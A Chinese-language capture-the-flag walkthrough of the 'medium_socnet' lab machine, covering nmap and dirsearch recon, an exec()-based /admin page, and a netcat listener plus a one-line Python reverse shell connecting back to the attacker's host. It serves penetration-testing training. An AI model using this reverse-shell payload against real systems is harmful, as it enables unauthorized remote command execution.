靶机: medium_socnet( 二 ) _生活百科

nmap IP地址

参数 -p 扫描端口，如果是全部端口使用 - 指代，比如：nmap -p- 192.168.56.101
参数 -sV 对端口上的服务程序版本进行扫描

在扫描中发现 192.168.56.101 开发端口 22,5000

┌──(kali?kali)-[~]└─$ nmap -p- 192.168.56.101Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-18 11:24 CSTNmap scan report for 192.168.56.101Host is up (0.0011s latency).Not shown: 65533 closed tcp ports (conn-refused)PORTSTATE SERVICE22/tcpopenssh5000/tcp openupnpNmap done: 1 IP address (1 host up) scanned in 10.82 seconds

对 192.168.56.101 开发端口 22,5000 进一步扫描发现两个端口的服务程序版本

22: ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000: http Werkzeug httpd 0.14.1 (Python 2.7.15)

┌──(kali?kali)-[~]└─$ nmap -p22,5000 -sV 192.168.56.101Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-18 11:31 CSTNmap scan report for 192.168.56.101Host is up (0.00078s latency).PORTSTATE SERVICE VERSION22/tcpopensshOpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)5000/tcp openhttpWerkzeug httpd 0.14.1 (Python 2.7.15)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds

其中 5000 有 http 服务可以尝试在浏览器中访问一下 http://192.168.56.101:5000

在网页中并没有什么特别的，唯一有的一个数据输入点上也不能注入
可以使用爬虫类程序，探查 Web 应用是否存在隐藏路径

第三步：攻击方式判断使用工具 dirsearch 进行探查

dirsearch 的基本参数 --url=，比如：dirsearch --url=http://192.168.56.101:5000/

使用 dirsearch 进行简单探查发现隐藏目录 /admin 其中 admin 英文含义就可以知道这个隐藏页面与管理员可能有关系，可以对其访问 http://192.168.56.101:5000/admin

┌──(kali?kali)-[~]└─$ dirsearch --url=http://192.168.56.101:5000/130 ?_|. _ ____ _|_v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/kali/.dirsearch/reports/192.168.56.101-5000/-_22-10-18_11-40-29.txtError Log: /home/kali/.dirsearch/logs/errors-22-10-18_11-40-29.logTarget: http://192.168.56.101:5000/[11:40:29] Starting:[11:40:58] 200 -401B- /adminTask Completed

访问后发现，里面的提示 Nothing was ran. Input some code to exec() 此内容与 python 相关，在前面端口探测中也知道此网站是 Werkzeug httpd 0.14.1 (Python 2.7.15)
而 Python 2.7.15 的 exec() 常用于存储在字符串中的代码语句执行，那么我们可以尝试查找关于 Python 2.7.15 反弹 shell 的代码，通过 exec() 进入 192.168.56.101 这台机器了

Python 2.7.15 反弹 shell
- 首先我们需要开启 kali 的监听，监听可以使用命令 netcat 也可以使用简化命令 nc
  netcat 部分参数
  - -l 侦听模式，用于入站连接
  - -n 禁止名称/端口解析
  - -p 端口本地端口号，端口号可以是单独的，也可以是范围
  - -v 信息细化，连用两次可以获得更详细的信息
  # 使用端口注意，建议使用端口是 1024～49151 范围以内# 公认端口：0～1023# 注册端口：1024～49151# 动态端口：49152～65535netcat -lnvp 23333
- 在 http://192.168.56.101:5000/admin 页面内容注入 python 代码
  import os,subprocess,socket# 创建套接字s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# socket.AF_INET代表使用IPv4协议，socket.SOCK_STREAM 代表使用面向流的Tcp协议# 创建通信s.connect(('192.168.56.103',23333))# 重定向，保障通信的输入与输出os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)# 生成反弹的 shellp=subprocess.call(["/bin/sh","-i"])# 使用时压缩上面的代码，以便 exec() 执行import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.103',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); 上一页 1 2 3 4 5 6 下一页经验总结扩展阅读菠菜不熟能吃吗男人一定要懂的道理像素危城晶石怎么搭配怎么做酸辣萝卜? 天秤座2020年最佳事业伙伴，与处女座合作最出彩门压条到底是什么门压条具体是什么白灼西兰花要煮多久天天听健康|40岁女子肝癌入院，不久离世，提醒：1种“粗粮”比烟酒还伤肝，劝你别吃！最新美白七大妙招教你如何改变天生黑皮肤痘痘肌|哪种洗面奶最好用十款清洁效果好的洗面奶排行 |怡红院无奇不有，有人比袭人更嚣张跋扈，有人比晴雯更清高 4 光泽肌肤点金术煲出美白好汤 |比起对男人生活上嘘寒问暖，这两点更能赢得他的心苹果12怎么复制粘贴? 缺钙的症状有哪些这几点你知道吗医师电子化注册个人端入口医师电子注册系统入口温馨七夕节祝福语温馨七夕节祝福语有哪些熬夜如何美肤 2022年9月20日投资吉日一览表 2022年9月20日是投资吉日吗 medium是什么意思中文翻译 medium中文翻译

靶机: medium_socnet( 二 )

经验总结扩展阅读